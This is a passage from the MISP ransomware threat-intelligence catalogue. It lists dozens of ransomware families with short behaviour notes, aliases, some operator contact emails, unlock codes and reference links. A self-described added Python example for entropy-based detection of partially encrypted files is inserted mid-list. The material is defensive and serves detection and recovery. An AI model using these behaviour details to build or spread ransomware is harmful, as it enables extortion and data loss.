The tag is: misp-galaxy:ransomware="AiraCrop"

Table 8160. Table References

Links

https://twitter.com/PolarToffee/status/796079699478900736

Al-Namrood

Ransomware

The tag is: misp-galaxy:ransomware="Al-Namrood"

Table 8161. Table References

Links

https://decrypter.emsisoft.com/al-namrood

Alpha Ransomware

Ransomware

The tag is: misp-galaxy:ransomware="Alpha Ransomware"

Alpha Ransomware is also known as:

  • AlphaLocker

Alpha Ransomware has relationships with:

  • similar: misp-galaxy:malpedia="AlphaLocker" with estimative-language:likelihood-probability="likely"

Table 8164. Table References

Links

http://download.bleepingcomputer.com/demonslay335/AlphaDecrypter.zip

https://www.bleepingcomputer.com/news/security/decrypted-alpha-ransomware-accepts-itunes-gift-cards-as-payment/

https://twitter.com/malwarebread/status/804714048499621888

AMBA

Ransomware. Targets websites only. Contact: amba@riseup.net

The tag is: misp-galaxy:ransomware="AMBA"

Table 8165. Table References

Links

https://twitter.com/benkow_/status/747813034006020096

https://www.enigmasoftware.com/ambaransomware-removal/

AngleWare

Ransomware

The tag is: misp-galaxy:ransomware="AngleWare"

Table 8166. Table References

Links

https://twitter.com/BleepinComputer/status/844531418474708993

Anony

Ransomware. Based on HiddenTear.

The tag is: misp-galaxy:ransomware="Anony"

Anony is also known as:

  • ngocanh

Table 8167. Table References

Links

https://twitter.com/struppigel/status/842047409446387714

Apocalypse

The tag is: misp-galaxy:ransomware="Apocalypse"

Apocalypse is also known as:

  • Fabiansomeware

Apocalypse has relationships with:

  • similar: misp-galaxy:rat="Apocalypse" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Apocalypse" with estimative-language:likelihood-probability="likely"

Table 8168. Table References

Links

https://decrypter.emsisoft.com/apocalypse

http://blog.emsisoft.com/2016/06/29/apocalypse-ransomware-which-targets-companies-through-insecure-rdp/

ApocalypseVM

Ransomware. A version of Apocalypse ransomware packed with VMProtect.

The tag is: misp-galaxy:ransomware="ApocalypseVM"

Table 8169. Table References

Links

http://decrypter.emsisoft.com/download/apocalypsevm

AutoLocky

Ransomware

The tag is: misp-galaxy:ransomware="AutoLocky"

Table 8170. Table References

Links

https://decrypter.emsisoft.com/autolocky

Aw3s0m3Sc0t7

Ransomware

The tag is: misp-galaxy:ransomware="Aw3s0m3Sc0t7"

Table 8171. Table References

Links

https://twitter.com/struppigel/status/828902907668000770

BaksoCrypt

Ransomware. Based on my-Little-Ransomware.

The tag is: misp-galaxy:ransomware="BaksoCrypt"

Table 8173. Table References

Links

https://twitter.com/JakubKroustek/status/760482299007922176

https://0xc1r3ng.wordpress.com/2016/06/24/bakso-crypt-simple-ransomware/

Bandarchor

Ransomware. Files might be only partially encrypted.

The tag is: misp-galaxy:ransomware="Bandarchor"

Bandarchor is also known as:

  • Rakhni

Bandarchor has relationships with:

  • similar: misp-galaxy:ransomware="Rakhni" with estimative-language:likelihood-probability="likely"

Table 8174. Table References

Links

https://reaqta.com/2016/03/bandarchor-ransomware-still-active/

https://www.bleepingcomputer.com/news/security/new-bandarchor-ransomware-variant-spreads-via-malvertising-on-adult-sites/

Bart

Ransomware. Possible affiliations with RockLoader, Locky and Dridex.

The tag is: misp-galaxy:ransomware="Bart"

Bart is also known as:

  • BaCrypt

Bart has relationships with:

  • similar: misp-galaxy:malpedia="Bart" with estimative-language:likelihood-probability="likely"

Table 8175. Table References

Links

http://now.avg.com/barts-shenanigans-are-no-match-for-avg/

http://phishme.com/rockloader-downloading-new-ransomware-bart/

https://www.proofpoint.com/us/threat-insight/post/New-Bart-Ransomware-from-Threat-Actors-Spreading-Dridex-and-Locky

BitCryptor

Ransomware. Has a GUI. CryptoGraphic Locker family; a newer CoinVault variant.

The tag is: misp-galaxy:ransomware="BitCryptor"

Table 8176. Table References

Links

https://noransom.kaspersky.com/

https://id-ransomware.blogspot.com/2016/05/bitcryptor-ransomware-aes-256-1-btc.html

BlackShades Crypter

Ransomware

The tag is: misp-galaxy:ransomware="BlackShades Crypter"

BlackShades Crypter is also known as:

  • SilentShade

  • BlackShades

Table 8178. Table References

Links

http://nyxbone.com/malware/BlackShades.html

https://id-ransomware.blogspot.com/2016/06/silentshade-ransomware-blackshades.html

Blocatto

Ransomware. Based on HiddenTear.

The tag is: misp-galaxy:ransomware="Blocatto"

Table 8179. Table References

Links

http://www.bleepingcomputer.com/forums/t/614456/bloccato-ransomware-bloccato-help-support-leggi-questo-filetxt/

Booyah

Ransomware. The EXE was replaced to neutralise the threat.

The tag is: misp-galaxy:ransomware="Booyah"

Booyah is also known as:

  • Salami

Booyah has relationships with:

  • similar: misp-galaxy:ransomware="MM Locker" with estimative-language:likelihood-probability="likely"

Brazilian

Ransomware. Based on EDA2.

The tag is: misp-galaxy:ransomware="Brazilian"

Table 8180. Table References

Links

http://www.nyxbone.com/malware/brazilianRansom.html

http://www.nyxbone.com/images/articulos/malware/brazilianRansom/0.png

Brazilian Globe

Ransomware

The tag is: misp-galaxy:ransomware="Brazilian Globe"

Table 8181. Table References

Links

https://twitter.com/JakubKroustek/status/821831437884211201

BrLock

Ransomware

The tag is: misp-galaxy:ransomware="BrLock"

Table 8182. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/ransomware-explosion-continues-cryptflle2-brlock-mm-locker-discovered

Browlock

Ransomware. No local encryption; browser-based locker only.

The tag is: misp-galaxy:ransomware="Browlock"

BTCWare Related to / new version of CryptXXX

Ransomware

The tag is: misp-galaxy:ransomware="BTCWare Related to / new version of CryptXXX"

Table 8183. Table References

Links

https://twitter.com/malwrhunterteam/status/845199679340011520

Bucbi

Ransomware. No file name change, no extension added.

The tag is: misp-galaxy:ransomware="Bucbi"

Table 8184. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/05/unit42-bucbi-ransomware-is-back-with-a-ukrainian-makeover/

https://id-ransomware.blogspot.com/2016/05/bucbi-ransomware.html

BuyUnlockCode

Ransomware. Does not delete Shadow Copies.

The tag is: misp-galaxy:ransomware="BuyUnlockCode"

Table 8185. Table References

Links

https://id-ransomware.blogspot.com/2016/05/buyunlockcode-ransomware-rsa-1024.html

Central Security Treatment Organization

Ransomware

The tag is: misp-galaxy:ransomware="Central Security Treatment Organization"

Central Security Treatment Organization has relationships with:

  • similar: misp-galaxy:ransomware="CryLocker" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="CryLocker" with estimative-language:likelihood-probability="likely"

Table 8186. Table References

Links

http://www.bleepingcomputer.com/forums/t/625820/central-security-treatment-organization-ransomware-help-topic-cry-extension/

https://id-ransomware.blogspot.com/2016/09/cry-ransomware.html

Cerber

Ransomware

The tag is: misp-galaxy:ransomware="Cerber"

Cerber is also known as:

  • CRBR ENCRYPTOR

Cerber has relationships with:

  • similar: misp-galaxy:malpedia="Cerber" with estimative-language:likelihood-probability="likely"

Table 8187. Table References

Links

https://blog.malwarebytes.org/threat-analysis/2016/03/cerber-ransomware-new-but-mature/

https://community.rsa.com/community/products/netwitness/blog/2016/11/04/the-evolution-of-cerber-v410

https://www.bleepingcomputer.com/news/security/cerber-renames-itself-as-crbr-encryptor-to-be-a-pita/

Clock

Ransomware. Does not encrypt anything.

The tag is: misp-galaxy:ransomware="Clock"

Table 8189. Table References

Links

https://twitter.com/JakubKroustek/status/794956809866018816

CoinVault

Ransomware. CryptoGraphic Locker family. Has a GUI. Do not confuse with CrypVault.

The tag is: misp-galaxy:ransomware="CoinVault"

Table 8190. Table References

Links

https://noransom.kaspersky.com/

https://id-ransomware.blogspot.com/2016/05/bitcryptor-ransomware-aes-256-1-btc.html

Cryaki

Ransomware

The tag is: misp-galaxy:ransomware="Cryaki"

Table 8192. Table References

Links

https://support.kaspersky.com/viruses/disinfection/8547

Crybola

Ransomware

The tag is: misp-galaxy:ransomware="Crybola"

Table 8193. Table References

Links

https://support.kaspersky.com/viruses/disinfection/8547

CryFile

Ransomware

The tag is: misp-galaxy:ransomware="CryFile"

Table 8194. Table References

Links

SHTODELATVAM.txt

Instructionaga.txt

https://id-ransomware.blogspot.com/2016/06/cryfile-ransomware-100.html

CryLocker

Ransomware. Identifies victim locations with the Google Maps API.

The tag is: misp-galaxy:ransomware="CryLocker"

CryLocker is also known as:

  • Cry

  • CSTO

  • Central Security Treatment Organization

CryLocker has relationships with:

  • similar: misp-galaxy:ransomware="Central Security Treatment Organization" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="CryLocker" with estimative-language:likelihood-probability="likely"

Table 8195. Table References

Links

http://www.bleepingcomputer.com/news/security/the-crylocker-ransomware-communicates-using-udp-and-stores-data-on-imgur-com/

https://id-ransomware.blogspot.com/2016/09/cry-ransomware.html

Crypter

Ransomware. Does not actually encrypt the files, but simply renames them.

The tag is: misp-galaxy:ransomware="Crypter"

Table 8199. Table References

Links

https://twitter.com/jiriatvirlab/status/802554159564062722

CryptInfinite

Ransomware

The tag is: misp-galaxy:ransomware="CryptInfinite"

CryptInfinite is also known as:

  • DecryptorMax

Table 8201. Table References

Links

https://decrypter.emsisoft.com/

https://id-ransomware.blogspot.com/2016/06/cryptfile2-ransomware-rsa-email.html

CryptoBit

Ransomware. Drops the file sekretzbel0ngt0us.KEY. Do not confuse with CryptorBit.

The tag is: misp-galaxy:ransomware="CryptoBit"

CryptoBit has relationships with:

  • similar: misp-galaxy:ransomware="Mobef" with estimative-language:likelihood-probability="likely"

Table 8202. Table References

Links

http://www.pandasecurity.com/mediacenter/panda-security/cryptobit/

http://news.softpedia.com/news/new-cryptobit-ransomware-could-be-decryptable-503239.shtml

https://id-ransomware.blogspot.com/2016/04/cryptobit-ransomware.html

CryptoDefense

Ransomware. No extension change.

The tag is: misp-galaxy:ransomware="CryptoDefense"

Table 8203. Table References

Links

https://decrypter.emsisoft.com/

https://id-ransomware.blogspot.com/2016/04/cryptodefense-ransomware.html

CryptoFinancial

Ransomware

The tag is: misp-galaxy:ransomware="CryptoFinancial"

CryptoFinancial is also known as:

  • Ranscam

CryptoFinancial has relationships with:

  • similar: misp-galaxy:malpedia="Ranscam" with estimative-language:likelihood-probability="likely"

Table 8204. Table References

Links

http://blog.talosintel.com/2016/07/ranscam.html

https://nakedsecurity.sophos.com/2016/07/13/ransomware-that-demands-money-and-gives-you-back-nothing/

https://id-ransomware.blogspot.com/search?q=CryptoFinancial

CryptoFortress

Ransomware. Mimics TorrentLocker. Encrypts only 50% of each file, up to 5 MB.

The tag is: misp-galaxy:ransomware="CryptoFortress"

CryptoFortress has relationships with:

  • similar: misp-galaxy:ransomware="TorrentLocker" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="CryptoFortress" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="TorrentLocker" with estimative-language:likelihood-probability="likely"

Table 8205. Table References

Links

https://id-ransomware.blogspot.com/2016/05/cryptofortress-ransomware-aes-256-1.html
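Families that encrypt only part of each file (Bandarchor above, "files might be partially encrypted", and CryptoFortress, 50% of each file up to 5 MB) are easy to misjudge during triage: a whole-file entropy check reads them as half-encrypted noise, while a header check may still see a valid signature. The following is an added example, not code from the MISP galaxy: it computes per-chunk Shannon entropy and classifies a file as plaintext, partially or fully encrypted. The sample files are constructed in-line with a seeded PRNG standing in for ciphertext, and which half is encrypted is an assumption for the demonstration, not a claim about either family.

```python
import math
import random
from collections import Counter

# Added example (not from the MISP galaxy): per-chunk Shannon entropy to tell
# fully encrypted files from partially encrypted ones such as those left by
# Bandarchor ("files might be partially encrypted") or CryptoFortress
# (50% of each file, up to 5 MB). The sample data is constructed in-line with a
# seeded PRNG standing in for ciphertext; which half is encrypted is an
# assumption for the demonstration, not a claim about either family.

CHUNK_SIZE = 4096
HIGH_ENTROPY = 7.5  # bits per byte; random/encrypted data sits near 8.0


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte of `data` (0.0 for empty input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def chunk_entropies(data: bytes, chunk_size: int = CHUNK_SIZE) -> list:
    """Entropy of each fixed-size chunk, in file order."""
    return [shannon_entropy(data[i:i + chunk_size]) for i in range(0, len(data), chunk_size)]


def encrypted_fraction(data: bytes, chunk_size: int = CHUNK_SIZE,
                       threshold: float = HIGH_ENTROPY) -> float:
    """Fraction of chunks that look encrypted (entropy >= threshold)."""
    ents = chunk_entropies(data, chunk_size)
    if not ents:
        return 0.0
    return sum(1 for e in ents if e >= threshold) / len(ents)


def classify(data: bytes) -> str:
    """'fully_encrypted', 'partially_encrypted' or 'plaintext'.

    Caveat: already-compressed formats (zip, jpg, mp4) are high-entropy by
    nature, so this heuristic must be combined with file-type checks; the
    cut-offs below are assumptions tuned for the constructed sample.
    """
    frac = encrypted_fraction(data)
    if frac >= 0.9:
        return "fully_encrypted"
    if frac >= 0.1:
        return "partially_encrypted"
    return "plaintext"


def build_samples(size: int = 64 * 1024) -> dict:
    """Constructed test files: plaintext, first half 'encrypted', all 'encrypted'."""
    rng = random.Random(1337)  # deterministic stand-in for ciphertext
    noise = bytes(rng.getrandbits(8) for _ in range(size))
    sentence = b"The quick brown fox jumps over the lazy dog. "
    text = (sentence * (size // len(sentence) + 1))[:size]
    return {
        "plaintext": text,
        "partial": noise[: size // 2] + text[size // 2:],
        "full": noise,
    }


if __name__ == "__main__":
    for name, blob in build_samples().items():
        print(f"{name:10} {encrypted_fraction(blob):.2f} encrypted -> {classify(blob)}")
```

The per-chunk list from `chunk_entropies` also tells you where the encrypted region sits, which is what decides whether a partially encrypted document is worth carving: with a 50%-of-file scheme the untouched tail often still contains recoverable content.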

CryptoGraphic Locker

Ransomware. Has a GUI. Subvariants: CoinVault, BitCryptor.

The tag is: misp-galaxy:ransomware="CryptoGraphic Locker"

CryptoHost

Ransomware. Locks the victim's files in a password-protected RAR archive; has a GUI.

The tag is: misp-galaxy:ransomware="CryptoHost"

CryptoHost is also known as:

  • Manamecrypt

  • Telograph

  • ROI Locker

CryptoHost has relationships with:

  • similar: misp-galaxy:malpedia="ManameCrypt" with estimative-language:likelihood-probability="likely"

Table 8206. Table References

Links

http://www.bleepingcomputer.com/news/security/cryptohost-decrypted-locks-files-in-a-password-protected-rar-file/

https://id-ransomware.blogspot.com/2016/04/cryptohost-ransomware.html

CryptoJoker

Ransomware

The tag is: misp-galaxy:ransomware="CryptoJoker"

CryptoJoker has relationships with:

  • similar: misp-galaxy:ransomware="CryptoNar" with estimative-language:likelihood-probability="likely"

Table 8207. Table References

Links

https://id-ransomware.blogspot.com/2017/07/cryptojoker-2017-ransomware.html

CryptoLocker

Ransomware. No longer relevant.

The tag is: misp-galaxy:ransomware="CryptoLocker"

CryptoLocker has relationships with:

  • similar: misp-galaxy:malpedia="CryptoLocker" with estimative-language:likelihood-probability="likely"

Table 8208. Table References

Links

https://www.fireeye.com/blog/executive-perspective/2014/08/your-locker-of-information-for-cryptolocker-decryption.html

https://reaqta.com/2016/04/uncovering-ransomware-distribution-operation-part-2/

CryptoLocker 1.0.0

Ransomware

The tag is: misp-galaxy:ransomware="CryptoLocker 1.0.0"

Table 8209. Table References

Links

https://twitter.com/malwrhunterteam/status/839747940122001408

CryptoLocker 5.1

Ransomware

The tag is: misp-galaxy:ransomware="CryptoLocker 5.1"

Table 8210. Table References

Links

https://twitter.com/malwrhunterteam/status/782890104947867649

CryptoMix

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix"

CryptoMix is also known as:

  • Zeta

CryptoMix has relationships with:

  • similar: misp-galaxy:malpedia="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

Table 8211. Table References

Links

http://www.nyxbone.com/malware/CryptoMix.html

https://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/

https://twitter.com/JakubKroustek/status/804009831518572544

https://www.bleepingcomputer.com/news/security/new-empty-cryptomix-ransomware-variant-released/

https://www.bleepingcomputer.com/news/security/0000-cryptomix-ransomware-variant-released/

https://www.bleepingcomputer.com/news/security/xzzx-cryptomix-ransomware-variant-released/

https://www.bleepingcomputer.com/news/security/test-cryptomix-ransomware-variant-released/

https://www.bleepingcomputer.com/news/security/work-cryptomix-ransomware-variant-released/

https://www.bleepingcomputer.com/news/security/system-cryptomix-ransomware-variant-released/

https://www.bleepingcomputer.com/news/security/mole66-cryptomix-ransomware-variant-released/

https://www.bleepingcomputer.com/news/security/new-backup-cryptomix-ransomware-variant-actively-infecting-users/

https://twitter.com/demonslay335/status/1072227523755470848

https://www.coveware.com/blog/cryptomix-ransomware-exploits-cancer-crowdfunding

https://www.bleepingcomputer.com/news/security/cryptomix-ransomware-exploits-sick-children-to-coerce-payments/

CryptoRansomeware

Ransomware

The tag is: misp-galaxy:ransomware="CryptoRansomeware"

CryptoRansomeware has relationships with:

  • similar: misp-galaxy:malpedia="CryptoRansomeware" with estimative-language:likelihood-probability="likely"

Table 8212. Table References

Links

https://twitter.com/malwrhunterteam/status/817672617658347521

CryptoShadow

Ransomware

The tag is: misp-galaxy:ransomware="CryptoShadow"

Table 8214. Table References

Links

https://twitter.com/struppigel/status/821992610164277248

CryptoTrooper

Ransomware

The tag is: misp-galaxy:ransomware="CryptoTrooper"

Table 8217. Table References

Links

http://news.softpedia.com/news/new-open-source-linux-ransomware-shows-infosec-community-divide-508669.shtml

CryptoWall 1

Ransomware. Infection by phishing.

The tag is: misp-galaxy:ransomware="CryptoWall 1"

CryptoWall 2

Ransomware

The tag is: misp-galaxy:ransomware="CryptoWall 2"

CryptoWall 4

Ransomware

The tag is: misp-galaxy:ransomware="CryptoWall 4"

CryptXXX

Ransomware Comes with Bedep

The tag is: misp-galaxy:ransomware="CryptXXX"

CryptXXX is also known as:

  • CryptProjectXXX

CryptXXX has relationships with:

  • similar: misp-galaxy:ransomware="CryptXXX 2.0" with estimative-language:likelihood-probability="likely"

Table 8219. Table References

Links

https://support.kaspersky.com/viruses/disinfection/8547

http://www.bleepingcomputer.com/virus-removal/cryptxxx-ransomware-help-information

https://id-ransomware.blogspot.com/2016/04/cryptxxx-ransomware.html

CryptXXX 2.0

Ransomware Locks screen. Ransom note names are an ID. Comes with Bedep.

The tag is: misp-galaxy:ransomware="CryptXXX 2.0"

CryptXXX 2.0 is also known as:

  • CryptProjectXXX

CryptXXX 2.0 has relationships with:

  • similar: misp-galaxy:ransomware="CryptXXX" with estimative-language:likelihood-probability="likely"

Table 8220. Table References

Links

https://support.kaspersky.com/viruses/disinfection/8547

https://www.proofpoint.com/us/threat-insight/post/cryptxxx2-ransomware-authors-strike-back-against-free-decryption-tool

http://blogs.cisco.com/security/cryptxxx-technical-deep-dive

https://id-ransomware.blogspot.com/2016/04/cryptxxx-ransomware.html

CTB-Faker

Ransomware

The tag is: misp-galaxy:ransomware="CTB-Faker"

CTB-Faker is also known as:

  • Citroni

Table 8224. Table References

Links

https://id-ransomware.blogspot.com/2016/07/ctb-faker-ransomware-008.html

CuteRansomware

Ransomware Based on my-Little-Ransomware

The tag is: misp-galaxy:ransomware="CuteRansomware"

CuteRansomware is also known as:

  • my-Little-Ransomware

Table 8226. Table References

Links

https://github.com/aaaddress1/my-Little-Ransomware/tree/master/decryptoTool

https://github.com/aaaddress1/my-Little-Ransomware

Cyber SpLiTTer Vbs

Ransomware Based on HiddenTear

The tag is: misp-galaxy:ransomware="Cyber SpLiTTer Vbs"

Cyber SpLiTTer Vbs is also known as:

  • CyberSplitter

Cyber SpLiTTer Vbs has relationships with:

  • similar: misp-galaxy:malpedia="CyberSplitter" with estimative-language:likelihood-probability="likely"

Table 8227. Table References

Links

https://twitter.com/struppigel/status/778871886616862720

https://twitter.com/struppigel/status/806758133720698881

https://id-ransomware.blogspot.com/2016/09/cyber-splitter-vbs-ransomware.html

Death Bitches

Ransomware

The tag is: misp-galaxy:ransomware="Death Bitches"

Table 8228. Table References

Links

https://twitter.com/JaromirHorejsi/status/815555258478981121

DeCrypt Protect

Ransomware

The tag is: misp-galaxy:ransomware="DeCrypt Protect"

Table 8229. Table References

Links

http://www.malwareremovalguides.info/decrypt-files-with-decrypt_mblblock-exe-decrypt-protect/

Demo

Ransomware only encrypts .jpg files

The tag is: misp-galaxy:ransomware="Demo"

Demo is also known as:

  • CryptoDemo

Table 8231. Table References

Links

https://twitter.com/struppigel/status/798573300779745281

https://id-ransomware.blogspot.com/2017/10/cryptodemo-ransomware.html

DetoxCrypto

Ransomware - Based on Detox: Calipso, We are all Pokemons, Nullbyte

The tag is: misp-galaxy:ransomware="DetoxCrypto"

Table 8232. Table References

Links

http://www.bleepingcomputer.com/news/security/new-detoxcrypto-ransomware-pretends-to-be-pokemongo-or-uploads-a-picture-of-your-screen/

https://id-ransomware.blogspot.com/2016/08/detoxcrypto-ransomware.html

Digisom

Ransomware

The tag is: misp-galaxy:ransomware="Digisom"

Table 8233. Table References

Links

https://twitter.com/PolarToffee/status/829727052316160000

DMALocker

Ransomware; no extension change. Encrypted files have prefix: Version 1: ABCXYZ11; Version 2: !DMALOCK; Version 3: !DMALOCK3.0; Version 4: !DMALOCK4.0

The tag is: misp-galaxy:ransomware="DMALocker"

Table 8235. Table References

Links

https://decrypter.emsisoft.com/

https://github.com/hasherezade/dma_unlocker

https://drive.google.com/drive/folders/0Bzb5kQFOXkiSMm94QzdyM3hCdDg

https://blog.malwarebytes.org/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/

DNRansomware

Ransomware Code to decrypt: 83KYG9NW-3K39V-2T3HJ-93F3Q-GT

The tag is: misp-galaxy:ransomware="DNRansomware"

Table 8237. Table References

Links

https://twitter.com/BleepinComputer/status/822500056511213568

DummyLocker

Ransomware

The tag is: misp-galaxy:ransomware="DummyLocker"

Table 8240. Table References

Links

https://twitter.com/struppigel/status/794108322932785158

HiddenTear

Ransomware Open sourced C#

The tag is: misp-galaxy:ransomware="HiddenTear"

HiddenTear is also known as:

  • Cryptear

  • EDA2

  • Hidden Tear

HiddenTear has relationships with:

  • similar: misp-galaxy:malpedia="EDA2" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="HiddenTear" with estimative-language:likelihood-probability="likely"

Table 8242. Table References

Links

http://www.utkusen.com/blog/dealing-with-script-kiddies-cryptear-b-incident.html

https://id-ransomware.blogspot.com/2016/06/hiddentear-2.html

EduCrypt

Ransomware Based on Hidden Tear

The tag is: misp-galaxy:ransomware="EduCrypt"

EduCrypt is also known as:

  • EduCrypter

Table 8243. Table References

Links

http://www.filedropper.com/decrypter_1

https://twitter.com/JakubKroustek/status/747031171347910656

https://id-ransomware.blogspot.com/2016/06/hiddentear-2.html

EiTest

Ransomware

The tag is: misp-galaxy:ransomware="EiTest"

Table 8244. Table References

Links

https://twitter.com/BroadAnalysis/status/845688819533930497

https://twitter.com/malwrhunterteam/status/845652520202616832

El-Polocker

Ransomware Has a GUI

The tag is: misp-galaxy:ransomware="El-Polocker"

El-Polocker is also known as:

  • Los Pollos Hermanos

Table 8245. Table References

Links

https://id-ransomware.blogspot.com/2016/07/el-polocker-ransomware-aes-450-aud.html

Encoder.xxxx

Ransomware Coded in GO

The tag is: misp-galaxy:ransomware="Encoder.xxxx"

Encoder.xxxx is also known as:

  • Trojan.Encoder.6491

Encoder.xxxx has relationships with:

  • similar: misp-galaxy:ransomware="Windows_Security Ransonware" with estimative-language:likelihood-probability="likely"

Table 8246. Table References

Links

http://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-14-2016-exotic-lockydump-comrade-and-more/

http://vms.drweb.ru/virus/?_is=1&i=8747343

encryptoJJS

Ransomware

The tag is: misp-galaxy:ransomware="encryptoJJS"

Table 8247. Table References

Links

https://id-ransomware.blogspot.com/2016/11/encryptojjs-ransomware.html

Enjey

Ransomware Based on RemindMe

The tag is: misp-galaxy:ransomware="Enjey"

Table 8249. Table References

Links

https://twitter.com/malwrhunterteam/status/839022018230112256

Fairware

Ransomware Target Linux O.S.

The tag is: misp-galaxy:ransomware="Fairware"

Table 8250. Table References

Links

http://www.bleepingcomputer.com/news/security/new-fairware-ransomware-targeting-linux-computers/

FakeCryptoLocker

Ransomware

The tag is: misp-galaxy:ransomware="FakeCryptoLocker"

Table 8252. Table References

Links

https://twitter.com/PolarToffee/status/812312402779836416

Fantom

Ransomware Based on EDA2

The tag is: misp-galaxy:ransomware="Fantom"

Fantom is also known as:

  • Comrad Circle

Table 8253. Table References

Links

http://www.bleepingcomputer.com/news/security/fantom-ransomware-encrypts-your-files-while-pretending-to-be-windows-update/

FILE FROZR

Ransomware RaaS

The tag is: misp-galaxy:ransomware="FILE FROZR"

FILE FROZR is also known as:

  • FileFrozr

Table 8255. Table References

Links

https://twitter.com/rommeljoven17/status/846973265650335744

https://id-ransomware.blogspot.com/2017/03/filefrozr-ransomware.html

FileLocker

Ransomware

The tag is: misp-galaxy:ransomware="FileLocker"

Table 8256. Table References

Links

https://twitter.com/jiriatvirlab/status/836616468775251968

FireCrypt

Ransomware

The tag is: misp-galaxy:ransomware="FireCrypt"

FireCrypt has relationships with:

  • similar: misp-galaxy:malpedia="FireCrypt" with estimative-language:likelihood-probability="likely"

Table 8257. Table References

Links

https://www.bleepingcomputer.com/news/security/firecrypt-ransomware-comes-with-a-ddos-component/

https://id-ransomware.blogspot.com/2017/01/bleedgreen-ransomware.html

Flyper

Ransomware Based on EDA2 / HiddenTear

The tag is: misp-galaxy:ransomware="Flyper"

Table 8258. Table References

Links

https://twitter.com/malwrhunterteam/status/773771485643149312

https://id-ransomware.blogspot.com/2016/09/flyper-ransomware.html

Fonco

Ransomware contact email safefiles32@mail.ru also as prefix in encrypted file contents

The tag is: misp-galaxy:ransomware="Fonco"

FortuneCookie

Ransomware

The tag is: misp-galaxy:ransomware="FortuneCookie"

Table 8259. Table References

Links

https://twitter.com/struppigel/status/842302481774321664

Free-Freedom

Ransomware Unlock code is: adam or adamdude9

The tag is: misp-galaxy:ransomware="Free-Freedom"

Free-Freedom is also known as:

  • Roga

Free-Freedom has relationships with:

  • similar: misp-galaxy:ransomware="Roga" with estimative-language:likelihood-probability="likely"

Table 8260. Table References

Links

https://twitter.com/BleepinComputer/status/812135608374226944

https://id-ransomware.blogspot.com/2016/12/roga-ransomware.html

Fury

Ransomware

The tag is: misp-galaxy:ransomware="Fury"

Table 8262. Table References

Links

https://support.kaspersky.com/viruses/disinfection/8547

Gingerbread

Ransomware

The tag is: misp-galaxy:ransomware="Gingerbread"

Table 8264. Table References

Links

https://twitter.com/ni_fi_70/status/796353782699425792

GNL Locker

Ransomware Only encrypts DE or NL country. Variants, from old to latest: Zyklon Locker, WildFire locker, Hades Locker

The tag is: misp-galaxy:ransomware="GNL Locker"

GNL Locker has relationships with:

  • similar: misp-galaxy:ransomware="Zyklon" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Zyklon" with estimative-language:likelihood-probability="likely"

Table 8266. Table References

Links

http://www.bleepingcomputer.com/forums/t/611342/gnl-locker-support-and-help-topic-locked-and-unlock-files-instructionshtml/

http://id-ransomware.blogspot.ru/2016/05/gnl-locker-ransomware-gnl-locker-ip.html

Gomasom

Ransomware

The tag is: misp-galaxy:ransomware="Gomasom"

Table 8267. Table References

Links

https://decrypter.emsisoft.com/

http://id-ransomware.blogspot.com/2016/05/gomasom-ransonware.html

Goopic

Ransomware

The tag is: misp-galaxy:ransomware="Goopic"

